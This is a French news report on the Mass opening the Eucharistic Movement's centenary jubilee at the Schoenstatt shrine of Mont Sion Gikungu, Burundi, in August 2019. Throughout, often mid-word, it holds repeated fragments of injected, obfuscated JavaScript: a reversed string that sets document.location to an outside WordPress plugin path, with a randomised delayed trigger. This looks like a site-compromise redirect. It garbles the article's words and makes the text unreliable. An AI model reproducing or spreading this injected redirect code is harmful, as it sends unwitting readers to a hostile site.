Ce dimanche 18 août 2019, le sanctuaire marial de Schoenstatt de Mont Sion Gikungu a eu la joie d’accueillir dans ses enceintes un effectif combien important de membres du Mouvement Eucharistique (ME) venus de tous les coins du pays. Ils étaient venus pour la cérémonie d’ouverture solennelle de l’année jubilaire de cent ans d’apostolat dudit ME. Cet événement vient s’ajouter à la date traditionnelle du 18 de chaque mois où les membres du Mouvement Apostolique de Schoenstatt renouvellent l’alliance d’amour avec la vierge Marie. La sainte Messe de ce dimanche a été présidée par Son Excellence Monseigneur émérite Evariste Ngoyagoye entouré par un bon nombre de prêtres, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont parmi eux le Recteur du sanctuaire et l’Aumônier national du ME. La Chorale Sancta Maria de Mont Sion et celle des étudiants membres du ME ont alternativement animé la Messe en chants liturgiques.
Juste au début de la Messe, le Père Recteur du sanctuaire a, dans un discours bref, souhaité la bienvenue aux pèlerins au sanctuaire marial de Schoenstatt de Mont Sion Gikungu et les a félicités pour l’année jubilaire qu’ils venaient ouvrir solennellement. Ils auront toute une année à évaluer leur apostolat après cent ans d’action afin d’en desceller les aboutissements et les failles pour les relever. Il a tenu également à informer les pèlerins que le sanctuaire marial de Schoenstatt de Mont Sion Gikungu est déjà dans son année jubilaire de vingt-cinq ans d’existence du sanctuaire marial à Mont Sion. Cette année jubilaire prendra fin le 23 octobre de l’année en cours, mais la grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande célébration est prévue pour le 19 du même mois. Les ME et Mouvement Apostolique de Schoenstatt (MAS) ont en commun la vierge Marie, par qui ils passent comme chemin court et sûr pour arriver à Jésus, et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc à Dieu et recevoir de lui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons et grâces nécessaires toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont ils ont besoin. Il était d’habitude et de tradition pour le ME de célébrer la fête patronale de saint Tharcisse le dimanche suivant l’assomption, mais il en a profité pour ouvrir leur année jubilaire.
L’Aumônier national du ME, l’Abbé Sept Désiré Remesha a aussi prononcé un discours solennel d’ouverture de l’année jubilaire. Avant l’annonce solennelle, il est revenu sur l’historique du mouvement dès ses débuts en France en 1844, à son arrivée au Burundi en 1920 par le Père Jean Marie Lepord, missionnaire d’Afrique. Celui-ci ayant été ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné prêtre en 1902, il a passé 40 ans d’apostolat à la Paroisse Muyaga avant d’y rendre son âme et y être enterré. L’Abbé Remesha n’a pas oublié de remercier Son Excellence Monseigneur Joachim Ntahondereye, évêque de Muyinga et Président du CECAB pour avoir autorisé l’ouverture de cette année jubilaire au ME. Ses remerciements ont été adressés à l’Archevêque de Bujumbura pour avoir accepté que cette ouverture ait lieu dans son archidiocèse.
Au cours de son homélie, Monseigneur émérite Ngoyagoye a tenu à préciser que ce n’est pas Dieu qui nous met en conflit, mais satan, le tentateur qui crée des divisions au sein de nos idées, comportements et croyances pour en fin de compte produire du désordre et de la mésentente insupportables entre parents et enfants, belles-mères et belles-filles et bien d’autres. Dans la première lecture, le Royaume d’Israël avait une grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande menace d’être attaqué par les Babyloniens et avait essuyé tant de pertes en vies humaines. Certains des conseillers du roi voulaient à tout prix continuer à se battre en retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant plus de moral aux soldats, mais en même temps d’autres, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le prophète Jérémie, s’y opposaient et voulaient que le peuple revînt à Dieu au lieu de mettre confiance en leurs forces ou à la force des armes.
La deuxième lecture, qui est l’épitre aux hébreux, est un appel à ceux qui ont cru en Dieu à tenir fermes et sans relâche dans la foi. Les membres du ME feraient de même en s’attachant à l’Eucharistie jusqu’à en mourir comme saint Tharcisse, leur saint patron. Son Excellence Monseigneur Ngoyagoye a conclu son enseignement en félicitant et souhaitant bonne préparation au ME pour la célébration très solennelle de leur jubilé en Août de l’an prochain. Il a souhaité également que cette année soit pour le ME une bonne occasion de s’autoévaluer afin d’évoluer encore de plus bel.
Après le chant d’action de grâce, le Président national du ME a prononcé un discours dans lequel il a invité tout un chacun à retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doubler plus d’effort pour être de bons apôtres dans ce monde en plein changement avec des mutations bouleversantes. Tenir fermes à leur foi, à leur baptême, aux promesses faites dans leur mouvement selon leur devise toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être leur préoccupation permanente. Ceci leur permettra de participer dans toutes les Messes et réunions du ME, retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doubler d’effort dans l’apostolat, s’acquitter régulièrement des cotisations du mouvement, visiter les malades et les prisonniers, etc. Il a aussi sollicité de la part de l’Aumônier pour le ME des enseignements qui réveillent leur foi et redynamisent leur apostolat. Le Président national du ME a terminé son discours en remerciant les Aumôniers national et diocésain du ME pour leur encadrement, le comité organisateur du jubilé, la Radio Maria pour ses diffusions et annonces publicitaires pour la fête en cours et le jubilé proprement dit l’année prochaine à la paroisse Muyaga où repose le corps du père Lepord.
Signalons qu’à la fin de la Messe il y a eu procession vers le sanctuaire marial et rite d’offrir le capital de grâces, qui est un rite de brûler les papiers sur lesquels les fidèles ont écrit leurs souhaits, demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes, actions de grâces et d’autres.
Méthode Nytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwi